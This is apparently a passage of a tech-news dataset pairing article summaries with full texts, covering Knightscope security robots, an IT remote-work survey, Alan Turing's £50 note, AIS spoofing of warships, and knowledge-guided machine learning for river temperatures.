Covid-19 in early 2020," Kostrzakemailed. The city spent over $137,000 over two years on the robot. When asked whether the city had seen any concrete evidence of a crime reduction from the robot, Kostrzak did not provide any. "It did successfully navigate the garage, technical hiccups were minimal as well as our residents and staff appreciated its presence," he emailed. "Had the robot contract been renewed, the second step would have been to expand into the [detailed] crime statistics for the area covered by the robot with our Police Department, unfortunately the onset of Covid-19 halted this plan." The Huntington Park and Las Vegas robots are the only specific examples named on the company's website that have allegedly contributed to a reduction in crime. But that's because Stephens, the company VP, said that nearly all of his company's clients do not want the details of any crime-related incidents to be made public. Ultimately, law enforcement and legal experts say that it is difficult for any firm to show that a given piece of technology definitively results in a reduction in crime. Andrew Ferguson , a law professor at American University, called these robots an "expensive version of security theater," using a term for procedures that aim to make an environment more secure, but do not always have that demonstrable effect. "This is an obviously noticeable surveillance device that is meant for you to look and stop and realize that you are under surveillance and that would deter you," he said. "They are slow, they don't do anything besides record a lot of data." One of the best uses for a robot may be what one community college in Arizona has tried. They're using the robot as a technological demonstration, and "less of a security tool." Libby Howell, a spokeswoman for Pima Community College in Tucson, noted that this model does not use the facial recognition feature, because that had raised concerns among faculty and students, many of whom are Dreamers, or immigrants brought to the United States as young children, who conceivably could be deported. "It's not trying to solve a problem," Howell said. "It's trying to show students that technology is changing by leaps and bounds every day, and what you are majoring in today could have application tomorrow." But Knightscope's users remain hopeful that these police robots will make a difference. Robert Krauss, the vice president of public safety at the Pechanga Resort Casino, about an hour's drive north of San Diego, said that in the past three years the casino has used one robot to roam the casino floor and five robots to stand next to human security at the casino's main entrances. He doesn't know how useful they have been in terms of stopping crime, but said that the robots have been able to identify panhandlers and other people that the casino wants to exclude. Once, video from a robot even staved off a potential slip-and-fall civil lawsuit by providing clear-cut footage of a woman who fell and claimed the casino was at fault. "You never know how many [bad actors] you've prevented by placing [the robots] there, so I don't know what we've prevented. But I can tell you we've never had anything serious," Krauss said, noting that many customers just like taking pictures with them. "Going forward, I will probably add one or two more."
Concrete proof that security robots are reducing crime is lacking, despite wider deployment by U.S. government agencies and the private sector. Despite claims that its robots "predict and prevent crime," U.S. security robot supplier Knightscope cites little public evidence that its products work, or specific cases of crimes they have foiled; its clients are similarly unaware of how effective the robots are. Huntington Park, CA's police department deployed a K5 model from Knightscope to patrol a local park; Huntington Park chief of police Cozme Lozano said in the two years since the robot's deployment, it was most useful in recording evidence of "robot tipping and vandalism against the robot itself." Law enforcement and legal experts say demonstrating that a given piece of technology clearly results in a reduction in crime is difficult, with American University's Andrew Ferguson calling crime-fighting robots an "expensive version of security theater."
[]
[]
[]
scitechnews
None
None
None
None
Concrete proof that security robots are reducing crime is lacking, despite wider deployment by U.S. government agencies and the private sector. Despite claims that its robots "predict and prevent crime," U.S. security robot supplier Knightscope cites little public evidence that its products work, or specific cases of crimes they have foiled; its clients are similarly unaware of how effective the robots are. Huntington Park, CA's police department deployed a K5 model from Knightscope to patrol a local park; Huntington Park chief of police Cozme Lozano said in the two years since the robot's deployment, it was most useful in recording evidence of "robot tipping and vandalism against the robot itself." Law enforcement and legal experts say demonstrating that a given piece of technology clearly results in a reduction in crime is difficult, with American University's Andrew Ferguson calling crime-fighting robots an "expensive version of security theater." When the Westland Real Estate Group bought Liberty Village, a sprawling 1,000-unit apartment complex on the northeastern edge of Las Vegas nearly two years ago, the police department identified it as one of the city's most frequent sources of 911 calls. "There was a little bit of everything," said Dena Lerner, a spokeswoman for Westland. "A lot of gang activity that revolved around controlled substances, prostitution, dog rings. We had issues with gun rings, drive-by shootings, robberies, assaults - we're talking everything." So earlier this year, Westland introduced a broader program to reduce crime and added an "autonomous security robot" manufactured by Knightscope, a Silicon Valley company to make the complex safer. Each robot is given a nickname, and the one roaming around Liberty Village is called "Westy." This model, K5, is a conical, bulky, artificial intelligence-powered robot that stands just over 5 feet tall. Westy slowly roams around at about a human walking speed, with four internal cameras capturing a constant 360-degree view. It also can scan and record license plates and unique digital identifiers that every cellphone broadcasts, known as MAC addresses. But it's unclear how much Westy has reduced crime at Liberty Village. Knightscope, which is eagerly trying to recruit new clients, told local news outlets that Westy had resulted in a "significant drop in 911 calls," underscoring "yet another crime-fighting win." Knightscope included articles about Westy as part of its recent pitch to individual investors and in its plans to take the company public . Officer Aden Ocampo-Gomez, a spokesman for the Las Vegas Metropolitan Police Department, said that while the complex is no longer in the agency's top 10 list for most frequent 911 calls in the northeastern part of the Las Vegas Valley, he doesn't think all the credit should go to Westy. "I cannot say it was due to the robot," he said. As more government agencies and private sector companies resort to robots to help fight crime, the verdict is out about how effective they are in actually reducing it. Knightscope, which experts say is the dominant player in this market, has cited little public evidence that its robots have reduced crime as the company deploys them everywhere from a Georgia shopping mall to an Arizona development to a Nevada casino . Knightscope's clients also don't know how much these security robots help. "Are we seeing dramatic changes since we deployed the robot in January?" Lerner, the Westland spokesperson said. "No. But I do believe it is a great tool to keep a community as large as this, to keep it safer, to keep it controlled." For its part, Knightscope maintains on its website that the robots "predict and prevent crime," without much evidence that they do so. Experts say this is a bold claim. "It would be difficult to introduce a single thing and it causes crime to go down," said Ryan Calo , a law professor at the University of Washington, comparing the Knightscope robots to a "roving scarecrow." Additionally, the company does not provide specific, detailed examples of crimes that have been thwarted due to the robots. "I definitely say that we are making a difference," said Stacy Stephens, Knightscope's co-founder and executive vice president. "You don't know what might have happened compared to deploying a security guard out there." The company's CEO, William Li, founded Knightscope after trying to come up with a response to the December 2012 mass shooting at Sandy Hook Elementary School in Connecticut that left 20 young children dead. "That infuriated me," Li, a former Ford executive, told USA Today in January 2014. The company came up with a robot that would "predict and prevent crime in your community," according to an archived version of its website. "There are 7 billion people on the planet, and we'll soon have a few billion more, and law enforcement is not going to scale at the same rate; we literally can't afford it," Li said. Since then Knightscope robots have become the crime-fighting friend of corporate clients in various cities nationwide, including Honolulu, Washington, D.C. and a community college in Tucson, Arizona . Typically, a casino, residential facility, bank or, in one case, a police department, rents a robot for an average fee of around $70,000 to $80,000 per year. Part of that cost involves Knightscope storing all of the data that robots like Westy gather in a year. This huge volume of data is the equivalent of more than the combined storage of 175 iPhones, each with the maximum storage capacity of 512 gigabytes. According to Knightscope's most recent annual report , the company has a current fleet of 52 machines used across 23 clients, with a backlog of 27 more robots to deliver. Each robot has an expected life span of "three to four and a half years." But the finances behind the police robot business is a difficult one. Last year, Knightscope lost more money than ever, with a $19.3 million net loss, nearly double from 2019. While some clients are buying more robots, the company's overall number of clients fell to 23, from 30, in the past four years. Plus, the number of robots leased has plateaued at 52 from the end of 2018 through the end of last year. The pandemic certainly didn't help things. Just two months ago, Knightscope told investors that there was "substantial doubt regarding our ability to continue " given the company's "accumulated deficit," or debt, of over $69 million as of the end of 2020. Its operating expenses jumped by more than 50 percent, including a small increase on research, and a doubling of the company's marketing budget. Knightscope itself recently told investors that absent additional fundraising efforts, it will "not be solvent after the third quarter of 2022." Stephens, Knightscope's co-founder, said that the company's client retention rate is 85 percent, and that the company has clients that have renewed for four years. "I can't comment on future rounds of funding. But we have been through seven rounds of funding to date," he said. "We've been able to advance the technology each time, and we have been able to grow the revenue side each time as well." Knightscope's best-known deployment is in Huntington Park, California, a small city south of downtown Los Angeles. The Huntington Park Police Department was the first law enforcement agency to partner directly with Knightscope. For two years, a single Knightscope robot, dubbed " HP RoboCop ," has roamed part of the city's Salt Lake Park. The robot captures constant video of park activity, and has the ability to broadcast back to police live, although the Huntington Park Police Department does not use this feature often. As recently as May 2020, the Huntington Park Police Department presented statistics to the City Council comparing a five-month period, from June to December, in 2018 and in 2019. The data shows that "crime or incident reports" went down, from 48 to 26, and arrests went up, from 11 to 14. "The K-5 robot is having a positive impact on crime and nuisance activity at Salt Lake Park, which is reducing the instances of police activity at the park," both the city manager, Ricardo Reyes, and the chief of police, Cosme Lozano, wrote to local lawmakers last year. In a recent interview, Lozano called the robot's presence a "positive result" and sees "no downside" in having it. But the department does not even use all of the robot's abilities, according to Lozano. The police can't monitor the robot's live video on a constant basis because that would "burn through" the 100 gigabytes of data that the agency has allotted to it per month, similar to a data cap on a monthly cellphone plan. Lozano added that the Huntington Park Police Department also does not use the license plate reader, thermal scanning or mobile phone scanning features, as they have not been adequately evaluated by the police department yet. When asked to cite examples of arrests that were made because of the robot over the two years since it was deployed, Lozano said there haven't been many. "I want to say that it's been useful in robot tipping and vandalism against the robot itself," he said, noting that this has only occurred twice in two years. Nevertheless, Lozano said he will recommend that the city renew the contract again when it comes before the City Council, which is expected in coming weeks. As Knightscope has expanded, it has been involved in both tragic and comical episodes. In 2016, a K5 roaming around Stanford Shopping Center in Palo Alto, California, hit a 16-month-old toddler, bruising his leg and running over his foot. The company apologized , calling it a "freakish accident," and invited the family to visit the company's nearby headquarters in Mountain View, which the family declined . The following year, another K5 robot slipped on steps adjacent to a fountain at the Washington Harbour development in Washington, D.C., falling into the water. In October 2019, a Huntington Park woman, Cogo Guebara, told NBC News that she tried reporting a fistfight by pressing an emergency alert button on the HP RoboCop itself, but to no avail. She learned later the emergency button was not yet connected to the police department itself. Knightscope once promoted several clients in California, including the NBA's Sacramento Kings the city of Hayward, and the Westfield Valley Fair Mall in Santa Clara,not far from the robot company's headquarters. But those clients say that they no longer have contracts with Knightscope. Hayward dispatched its robot in a city parking garage in 2018. The following year, a man attacked and knocked over the robot. Despite having clear video and photographic evidence of the alleged crime , no one was arrested, according to Adam Kostrzak, the city's chief information officer.However, last year, Hayward did not renew the annual contract with Knightscope "due to the financial impact of Covid-19 in early 2020," Kostrzakemailed. The city spent over $137,000 over two years on the robot. When asked whether the city had seen any concrete evidence of a crime reduction from the robot, Kostrzak did not provide any. "It did successfully navigate the garage, technical hiccups were minimal as well as our residents and staff appreciated its presence," he emailed. "Had the robot contract been renewed, the second step would have been to expand into the [detailed] crime statistics for the area covered by the robot with our Police Department, unfortunately the onset of Covid-19 halted this plan." The Huntington Park and Las Vegas robots are the only specific examples named on the company's website that have allegedly contributed to a reduction in crime. But that's because Stephens, the company VP, said that nearly all of his company's clients do not want the details of any crime-related incidents to be made public. Ultimately, law enforcement and legal experts say that it is difficult for any firm to show that a given piece of technology definitively results in a reduction in crime. Andrew Ferguson , a law professor at American University, called these robots an "expensive version of security theater," using a term for procedures that aim to make an environment more secure, but do not always have that demonstrable effect. "This is an obviously noticeable surveillance device that is meant for you to look and stop and realize that you are under surveillance and that would deter you," he said. "They are slow, they don't do anything besides record a lot of data." One of the best uses for a robot may be what one community college in Arizona has tried. They're using the robot as a technological demonstration, and "less of a security tool." Libby Howell, a spokeswoman for Pima Community College in Tucson, noted that this model does not use the facial recognition feature, because that had raised concerns among faculty and students, many of whom are Dreamers, or immigrants brought to the United States as young children, who conceivably could be deported. "It's not trying to solve a problem," Howell said. "It's trying to show students that technology is changing by leaps and bounds every day, and what you are majoring in today could have application tomorrow." But Knightscope's users remain hopeful that these police robots will make a difference. Robert Krauss, the vice president of public safety at the Pechanga Resort Casino, about an hour's drive north of San Diego, said that in the past three years the casino has used one robot to roam the casino floor and five robots to stand next to human security at the casino's main entrances. He doesn't know how useful they have been in terms of stopping crime, but said that the robots have been able to identify panhandlers and other people that the casino wants to exclude. Once, video from a robot even staved off a potential slip-and-fall civil lawsuit by providing clear-cut footage of a woman who fell and claimed the casino was at fault. "You never know how many [bad actors] you've prevented by placing [the robots] there, so I don't know what we've prevented. But I can tell you we've never had anything serious," Krauss said, noting that many customers just like taking pictures with them. "Going forward, I will probably add one or two more."
199
IT Leaders Say Cybersecurity Funding Being Wasted on Remote Work Support: Survey
A JumpCloud survey of 401 IT decision-makers at small and medium-sized enterprises found that 56% think their organizations are spending too much to enable remote work. Over 60% of those polled said their organizations paid "for more tooling than they need" to manage user identities. When asked about their top concerns, 39% cited software vulnerabilities, followed by reused user names and passwords (37%), unsecured networks (36%), and device theft (29%). Thirty-three percent of respondents said their organizations were in the process of implementing a Zero Trust security approach, while 53% said multi-factor authentication is required across everything. Among other things, more than half of respondents said IT budgets this year largely would be used to support remote management, security, and cloud services, and about two-thirds of responding IT managers said they felt "overwhelmed" by the management of remote workers.
[]
[]
[]
scitechnews
None
None
None
None
A JumpCloud survey of 401 IT decision-makers at small and medium-sized enterprises found that 56% think their organizations are spending too much to enable remote work. Over 60% of those polled said their organizations paid "for more tooling than they need" to manage user identities. When asked about their top concerns, 39% cited software vulnerabilities, followed by reused user names and passwords (37%), unsecured networks (36%), and device theft (29%). Thirty-three percent of respondents said their organizations were in the process of implementing a Zero Trust security approach, while 53% said multi-factor authentication is required across everything. Among other things, more than half of respondents said IT budgets this year largely would be used to support remote management, security, and cloud services, and about two-thirds of responding IT managers said they felt "overwhelmed" by the management of remote workers.
200
WWII Codebreaker Alan Turing Becomes 1st Gay Man on British Bank Note
The Bank of England began circulating its new £50 bank notes featuring World War II codebreaker Alan Turing on Wednesday, which would have been the pioneering math genius' 109th birthday. Often referred to as the "father of computer science and artificial intelligence," Turing was hailed a war hero and granted an honor by King George VI at the end of the war for helping to defeat the Nazis. Despite this, however, he died as a disgraced "criminal" - simply for being a gay man. "I'm delighted that Alan Turing features on our new £50 bank note. He was a brilliant scientist whose thinking still shapes our lives today," Sarah John, Bank of England's chief cashier, told NBC News. "However, his many contributions to society were still not enough to spare him the appalling treatment to which he was subjected simply because he was gay. By placing him on this new £50, we are celebrating his life and his achievements, of which we should all be very proud." Born in London on June 23, 1912, Turing graduated from the University of Cambridge in 1934. At the start of WWII, he joined the British government's wartime operation, designing a code-breaking machine known as "Bombe." Bombe went on to supply the Allied Forces with significant military intelligence, processing, at its peak, 89,000 coded messages per day. At the end of the war, Turing was made an Officer of the Most Excellent Order of the British Empire, an honor granted by the royal family to a selected few for their contribution to science, arts and public service. In the years that followed, Turing carried on working as a computer scientist. His design for the Automatic Computing Engine, or ACE, would have been the first and most advanced computer for his time. But his colleagues at the National Physical Laboratory feared the engineering was too complex and decided to build a much smaller pilot ACE instead. Their competitors at Manchester University consequently won the race, and the disheartened Turing had joined their forces as deputy director. Turing also wrote the first programming manual. "What we really don't realize is how this moment and Turing's vision changed the entire world. Before this, literally nobody in the world had imagined that a single machine could apply countless strings of abstract symbols. Now we know them as programs," according to David Leslie of the Alan Turing Institute. But being an outstanding computer scientist and a war hero didn't spare Turing from what some have called a "witch hunt" of gay and bisexual men in the U.K., which led to the imprisonment of thousands of gay men and those suspected of being gay throughout the 1950s. In January 1952, Turing was prosecuted for indecency over his relationship with another man in Manchester. Despite being referred to as a "national asset" during this trial by character witness Hugh Alexander, the head of cryptanalysis at the Government Communications Headquarter, Turing was persecuted. In March of that year, Turing pleaded guilty and, to avoid imprisonment, had to agree to be chemically castrated by taking a hormonal treatment designed to suppress his libido. His criminal record disqualified him from working for a governmental intelligence agency. Disgraced and disenfranchised, he took his own life by cyanide poisoning June 8, 1954, in his home in Manchester. He was 41. Homosexuality was decriminalized in the U.K. more than a decade later June 14, 1967. Despite his tragic end, Turing's legacy as a wartime hero and the father of computer science has lived on, and the British government has attempted to right its past wrongs. In 2009, more than a half century after Turing's death, then-British Prime Minister Gordon Brown, speaking on behalf of the government, publicly apologized for Turing's "utterly unfair" treatment. In 2013, Queen Elizabeth II granted Turing a royal pardon. Featuring him on a £50 bank note marks another milestone. This is the first time that a gay man is featured on a British bank note. It has been welcomed by parts of the LGBTQ community as a symbol of the country facing up to its dark past of the horrific persecution of gay men. This visionary computer and artificial intelligence pioneer, once criminalized and disgraced, is now widely celebrated. In Turing's own words from 1949: "This is only a foretaste of what is to come, and only the shadow of what is going to be." Follow NBC Out on Twitter , Facebook & Instagram
The Bank of England this week rolled out new £50 bank notes featuring World War II codebreaker Alan Turing, known as the "father of computer science and artificial intelligence," on what would have been his 109th birthday. Bank of England's Sarah John said, "He was a brilliant scientist whose thinking still shapes our lives today. However, his many contributions to society were still not enough to spare him the appalling treatment to which he was subjected simply because he was gay. By placing him on this new £50, we are celebrating his life and his achievements, of which we should all be very proud."
[]
[]
[]
scitechnews
None
None
None
None
The Bank of England this week rolled out new £50 bank notes featuring World War II codebreaker Alan Turing, known as the "father of computer science and artificial intelligence," on what would have been his 109th birthday. Bank of England's Sarah John said, "He was a brilliant scientist whose thinking still shapes our lives today. However, his many contributions to society were still not enough to spare him the appalling treatment to which he was subjected simply because he was gay. By placing him on this new £50, we are celebrating his life and his achievements, of which we should all be very proud." The Bank of England began circulating its new £50 bank notes featuring World War II codebreaker Alan Turing on Wednesday, which would have been the pioneering math genius' 109th birthday. Often referred to as the "father of computer science and artificial intelligence," Turing was hailed a war hero and granted an honor by King George VI at the end of the war for helping to defeat the Nazis. Despite this, however, he died as a disgraced "criminal" - simply for being a gay man. "I'm delighted that Alan Turing features on our new £50 bank note. He was a brilliant scientist whose thinking still shapes our lives today," Sarah John, Bank of England's chief cashier, told NBC News. "However, his many contributions to society were still not enough to spare him the appalling treatment to which he was subjected simply because he was gay. By placing him on this new £50, we are celebrating his life and his achievements, of which we should all be very proud." Born in London on June 23, 1912, Turing graduated from the University of Cambridge in 1934. At the start of WWII, he joined the British government's wartime operation, designing a code-breaking machine known as "Bombe." Bombe went on to supply the Allied Forces with significant military intelligence, processing, at its peak, 89,000 coded messages per day. At the end of the war, Turing was made an Officer of the Most Excellent Order of the British Empire, an honor granted by the royal family to a selected few for their contribution to science, arts and public service. In the years that followed, Turing carried on working as a computer scientist. His design for the Automatic Computing Engine, or ACE, would have been the first and most advanced computer for his time. But his colleagues at the National Physical Laboratory feared the engineering was too complex and decided to build a much smaller pilot ACE instead. Their competitors at Manchester University consequently won the race, and the disheartened Turing had joined their forces as deputy director. Turing also wrote the first programming manual. "What we really don't realize is how this moment and Turing's vision changed the entire world. Before this, literally nobody in the world had imagined that a single machine could apply countless strings of abstract symbols. Now we know them as programs," according to David Leslie of the Alan Turing Institute. But being an outstanding computer scientist and a war hero didn't spare Turing from what some have called a "witch hunt" of gay and bisexual men in the U.K., which led to the imprisonment of thousands of gay men and those suspected of being gay throughout the 1950s. In January 1952, Turing was prosecuted for indecency over his relationship with another man in Manchester. Despite being referred to as a "national asset" during this trial by character witness Hugh Alexander, the head of cryptanalysis at the Government Communications Headquarter, Turing was persecuted. In March of that year, Turing pleaded guilty and, to avoid imprisonment, had to agree to be chemically castrated by taking a hormonal treatment designed to suppress his libido. His criminal record disqualified him from working for a governmental intelligence agency. Disgraced and disenfranchised, he took his own life by cyanide poisoning June 8, 1954, in his home in Manchester. He was 41. Homosexuality was decriminalized in the U.K. more than a decade later June 14, 1967. Despite his tragic end, Turing's legacy as a wartime hero and the father of computer science has lived on, and the British government has attempted to right its past wrongs. In 2009, more than a half century after Turing's death, then-British Prime Minister Gordon Brown, speaking on behalf of the government, publicly apologized for Turing's "utterly unfair" treatment. In 2013, Queen Elizabeth II granted Turing a royal pardon. Featuring him on a £50 bank note marks another milestone. This is the first time that a gay man is featured on a British bank note. It has been welcomed by parts of the LGBTQ community as a symbol of the country facing up to its dark past of the horrific persecution of gay men. This visionary computer and artificial intelligence pioneer, once criminalized and disgraced, is now widely celebrated. In Turing's own words from 1949: "This is only a foretaste of what is to come, and only the shadow of what is going to be." Follow NBC Out on Twitter , Facebook & Instagram
202
GPS Cyberattack Falsely Placed U.K. Warship Near Russian Naval Base
A cyberattack may have been involved in a naval confrontation this week between Russia and a British warship in the Black Sea that never really happened. The global positioning system (GPS) -tracking Automatic Identification System (AIS) last week showed both a U.K. warship and a Dutch naval vessel coming within a few kilometers of a Russian naval base at Sevastopol, but a live Web camera feed confirmed that both ships were docked in Odessa, Ukraine, at the time. The spoofing in this case suggests a deliberate deception, as the ships' coordinates were changed gradually to imitate normal travel. Dana Goward at the Resilient Navigation and Timing Foundation said Russia could have executed the spoofing attack, and warned that such a hack "could easily lead to a shooting war by making things more confusing in a crisis."
[]
[]
[]
scitechnews
None
None
None
None
A cyberattack may have been involved in a naval confrontation this week between Russia and a British warship in the Black Sea that never really happened. The global positioning system (GPS) -tracking Automatic Identification System (AIS) last week showed both a U.K. warship and a Dutch naval vessel coming within a few kilometers of a Russian naval base at Sevastopol, but a live Web camera feed confirmed that both ships were docked in Odessa, Ukraine, at the time. The spoofing in this case suggests a deliberate deception, as the ships' coordinates were changed gradually to imitate normal travel. Dana Goward at the Resilient Navigation and Timing Foundation said Russia could have executed the spoofing attack, and warned that such a hack "could easily lead to a shooting war by making things more confusing in a crisis."
203
ML Methods Could Improve Environmental Predictions
Machine learning algorithms do a lot for us every day - send unwanted email to our spam folder, warn us if our car is about to back into something, and give us recommendations on what TV show to watch next. Now, we are increasingly using these same algorithms to make environmental predictions for us. A team of researchers from the University of Minnesota, University of Pittsburgh, and U.S. Geological Survey recently published a new study on predicting flow and temperature in river networks in the 2021 Society for Industrial and Applied Mathematics (SIAM) International Conference on Data Mining (SDM21) proceedings. The study was funded by the National Science Foundation (NSF). The research demonstrates a new machine learning method where the algorithm is "taught" the rules of the physical world in order to make better predictions and steer the algorithm toward physically meaningful relationships between inputs and outputs. The study presents a model that can make more accurate river and stream temperature predictions, even when little data is available, which is the case in most rivers and streams. The model can also better generalize to different time periods. "Water temperature in streams is a 'master variable' for many important aquatic systems, including the suitability of aquatic habitats, evaporation rates, greenhouse gas exchange, and efficiency of thermoelectric energy production," said Xiaowei Jia , a lead author of the study and assistant professor in the University of Pittsburgh's Department of Computer Science at University in the School of Computing and Information. "Accurate prediction of water temperature and streamflow also aids in decision making for resource managers, for example helping them to determine when and how much water to release from reservoirs to downstream rivers. A common criticism of machine learning is that the predictions aren't rooted in physical meaning. That is, the algorithms are just finding correlations between inputs and outputs, and sometimes those correlations can be "spurious" or give false results. The model often won't be able to handle a situation where the relationship between inputs and outputs changes. The new method published by Jia, who is also a 2020 Ph.D. graduate of the University of Minnesota Department of Computer Science and Engineering in the College of Science and Engineering, and his colleagues uses "process-guided or knowledge-guided machine learning." This method is applied to a use case of water temperature prediction in the Delaware River Basin (DRB) and is designed to overcome some of the common pitfalls of prediction using machine learning. The method informs the machine learning model with a relatively simple process - correlation through time, the spatial connections between streams, and energy budget equations. Data sparsity and variability in stream temperature dynamics are not unique to the Delaware River Basin. Relative to most of the continental United States, the Delaware River Basin is well-monitored for water temperature. The Delaware River Basin is therefore an ideal place to develop new methods for stream temperature prediction. An interactive visual explainer released by the U.S. Geological Survey highlights these model developments and the importance of water temperature predictions in the DRB. The visualization demonstrates the societal need for water temperature predictions, where reservoirs provide drinking water to more than 15 million people, but also have competing water demands to maintain downstream flows and cold-water habitat for important game fish species. Reservoir managers can release cold water when they anticipate water temperature will exceed critical thresholds and having accurate water temperature predictions is key to using limited water resources only when necessary. The recent study builds on a collaboration between water scientists at the U.S. Geological Survey and University of Minnesota Twin Cities computer scientists in Professor Vipin Kumar's lab in the College of Science and Engineering's Department of Computer Science and Engineering, where researchers have been developing knowledge-guided machine learning techniques. "These knowledge-guided machine learning techniques are fundamentally more powerful than standard machine learning approaches and traditional mechanistic models used by the scientific community to address environmental problems," Kumar said. These new generation of machine learning methods, funded by NSF's Harnessing the Data Revolution Program, are being used to address a variety of environmental problems such as improving lake and stream temperature predictions. In another new NSF-funded study on predicting water temperature dynamics of unmonitored lakes in the American Geophysical Union's Water Resources Research led by University of Minnesota Department of Computer Science and Engineering Ph.D. candidate Jared Willard, researchers show how knowledge-guided machine learning models were used to solve one of the most challenging environmental prediction problems - prediction in unmonitored ecosystems. Models were transferred from well-observed lakes to lakes with few to no observations, leading to accurate predictions even in lakes where temperature observations don't exist. Researchers say their approach readily scales to thousands of lakes, demonstrating that the method (with meaningful predictor variables and high-quality source models) is a promising approach for many kinds of unmonitored systems and environmental variables in the future. -30-
New process- or knowledge-guided machine learning (ML) techniques can predict flow and temperature in river networks more accurately even when data is scarce, according to researchers at the University of Minnesota, the University of Pittsburgh (Pitt), and the U.S. Geological Survey. The work involved an algorithm that was taught physical rules to generate more accurate forecasts and identify physically significant relationships between inputs and outputs. The method was designed to avoid common traps in ML-based prediction by informing the model through correlation across time, spatial links between streams, and energy budget equations. Pitt's Xiaowei Jia said, "Accurate prediction of water temperature and streamflow [can assist in] decision making for resource managers, for example helping them to determine when and how much water to release from reservoirs to downstream rivers."
[]
[]
[]
scitechnews
None
None
None
None
New process- or knowledge-guided machine learning (ML) techniques can predict flow and temperature in river networks more accurately even when data is scarce, according to researchers at the University of Minnesota, the University of Pittsburgh (Pitt), and the U.S. Geological Survey. The work involved an algorithm that was taught physical rules to generate more accurate forecasts and identify physically significant relationships between inputs and outputs. The method was designed to avoid common traps in ML-based prediction by informing the model through correlation across time, spatial links between streams, and energy budget equations. Pitt's Xiaowei Jia said, "Accurate prediction of water temperature and streamflow [can assist in] decision making for resource managers, for example helping them to determine when and how much water to release from reservoirs to downstream rivers." Machine learning algorithms do a lot for us every day - send unwanted email to our spam folder, warn us if our car is about to back into something, and give us recommendations on what TV show to watch next. Now, we are increasingly using these same algorithms to make environmental predictions for us. A team of researchers from the University of Minnesota, University of Pittsburgh, and U.S. Geological Survey recently published a new study on predicting flow and temperature in river networks in the 2021 Society for Industrial and Applied Mathematics (SIAM) International Conference on Data Mining (SDM21) proceedings. The study was funded by the National Science Foundation (NSF). The research demonstrates a new machine learning method where the algorithm is "taught" the rules of the physical world in order to make better predictions and steer the algorithm toward physically meaningful relationships between inputs and outputs. The study presents a model that can make more accurate river and stream temperature predictions, even when little data is available, which is the case in most rivers and streams. The model can also better generalize to different time periods. "Water temperature in streams is a 'master variable' for many important aquatic systems, including the suitability of aquatic habitats, evaporation rates, greenhouse gas exchange, and efficiency of thermoelectric energy production," said Xiaowei Jia , a lead author of the study and assistant professor in the University of Pittsburgh's Department of Computer Science at University in the School of Computing and Information. "Accurate prediction of water temperature and streamflow also aids in decision making for resource managers, for example helping them to determine when and how much water to release from reservoirs to downstream rivers. A common criticism of machine learning is that the predictions aren't rooted in physical meaning. That is, the algorithms are just finding correlations between inputs and outputs, and sometimes those correlations can be "spurious" or give false results. The model often won't be able to handle a situation where the relationship between inputs and outputs changes. The new method published by Jia, who is also a 2020 Ph.D. graduate of the University of Minnesota Department of Computer Science and Engineering in the College of Science and Engineering, and his colleagues uses "process-guided or knowledge-guided machine learning." This method is applied to a use case of water temperature prediction in the Delaware River Basin (DRB) and is designed to overcome some of the common pitfalls of prediction using machine learning. The method informs the machine learning model with a relatively simple process - correlation through time, the spatial connections between streams, and energy budget equations. Data sparsity and variability in stream temperature dynamics are not unique to the Delaware River Basin. Relative to most of the continental United States, the Delaware River Basin is well-monitored for water temperature. The Delaware River Basin is therefore an ideal place to develop new methods for stream temperature prediction. An interactive visual explainer released by the U.S. Geological Survey highlights these model developments and the importance of water temperature predictions in the DRB. The visualization demonstrates the societal need for water temperature predictions, where reservoirs provide drinking water to more than 15 million people, but also have competing water demands to maintain downstream flows and cold-water habitat for important game fish species. Reservoir managers can release cold water when they anticipate water temperature will exceed critical thresholds and having accurate water temperature predictions is key to using limited water resources only when necessary. The recent study builds on a collaboration between water scientists at the U.S. Geological Survey and University of Minnesota Twin Cities computer scientists in Professor Vipin Kumar's lab in the College of Science and Engineering's Department of Computer Science and Engineering, where researchers have been developing knowledge-guided machine learning techniques. "These knowledge-guided machine learning techniques are fundamentally more powerful than standard machine learning approaches and traditional mechanistic models used by the scientific community to address environmental problems," Kumar said. These new generation of machine learning methods, funded by NSF's Harnessing the Data Revolution Program, are being used to address a variety of environmental problems such as improving lake and stream temperature predictions. In another new NSF-funded study on predicting water temperature dynamics of unmonitored lakes in the American Geophysical Union's Water Resources Research led by University of Minnesota Department of Computer Science and Engineering Ph.D. candidate Jared Willard, researchers show how knowledge-guided machine learning models were used to solve one of the most challenging environmental prediction problems - prediction in unmonitored ecosystems. Models were transferred from well-observed lakes to lakes with few to no observations, leading to accurate predictions even in lakes where temperature observations don't exist. Researchers say their approach readily scales to thousands of lakes, demonstrating that the method (with meaningful predictor variables and high-quality source models) is a promising approach for many kinds of unmonitored systems and environmental variables in the future. -30-
205
App Taps Unwitting Users Abroad to Gather Open Source Intelligence
Gig workers, often in developing countries, are being recruited to gather open source intelligence for governments through a mobile phone application. San Francisco-based Premise Data pays workers to perform data collection and observational reporting tasks like capturing photos, and in recent years has tapped this workforce to conduct basic reconnaissance and gauge public opinion for the U.S. military and foreign governments. Premise's Maury Blackman said, "Data gained from our contributors helped inform government policymakers on how to best deal with vaccine hesitancy, susceptibility to foreign interference and misinformation in elections, as well as the location and nature of gang activity in Honduras."
[]
[]
[]
scitechnews
None
None
None
None
Gig workers, often in developing countries, are being recruited to gather open source intelligence for governments through a mobile phone application. San Francisco-based Premise Data pays workers to perform data collection and observational reporting tasks like capturing photos, and in recent years has tapped this workforce to conduct basic reconnaissance and gauge public opinion for the U.S. military and foreign governments. Premise's Maury Blackman said, "Data gained from our contributors helped inform government policymakers on how to best deal with vaccine hesitancy, susceptibility to foreign interference and misinformation in elections, as well as the location and nature of gang activity in Honduras."
206
Algorithm Helps Autonomous Vehicles Find Themselves, Summer or Winter
